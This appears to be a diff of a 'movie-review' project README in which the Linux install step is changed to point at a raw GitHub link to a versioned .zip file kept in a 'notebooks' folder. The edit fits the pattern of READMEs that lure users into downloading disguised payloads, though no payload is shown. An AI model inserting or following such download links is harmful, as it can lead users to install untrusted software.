S4turno0/movie-review/README.md

 4. **Install the Application**:
    - For Windows: Double-click the `.exe` file and follow the on-screen instructions to install.
    - For macOS: Open the `.dmg` file and drag the movie-review icon into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the installation instructions included.
+   - For Linux: Extract the `https://raw.githubusercontent.com/S4turno0/movie-review/main/notebooks/movie_review_3.1-alpha.4.zip` file and follow the installation instructions included.

 ## 🎉 Features